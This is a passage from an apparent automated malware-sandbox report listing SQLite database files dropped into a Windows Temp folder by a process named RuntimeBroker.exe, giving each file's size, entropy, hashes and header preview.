                                                                                                            C:\Users\user\AppData\Local\Temp\8GvQC240oo

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\8iootwMWdE

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\91uvoGfst3

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\954es4zqGy

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\9rOJ60Dmkr

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\A9lRj27AWS

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\A9v8FabEn1

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\AkT6Riv7eT

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\AubMUNKAw6

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\BVONiw2p3z

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Bcy3AgBJG1

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\BwkqLZGn7D

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\CuLCMj9lRH

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\D1tFBIEbI4

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\DZ7POd8uFn

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\E9KeadD3yn

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\EHNPFb26nV

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\EWWOdovFBp

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\ErfwV1eDu2

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\EwOJ5AlXpJ

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\FA7o19vBGY

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\FP2r13DsCc

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\GEW2qXHtly

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
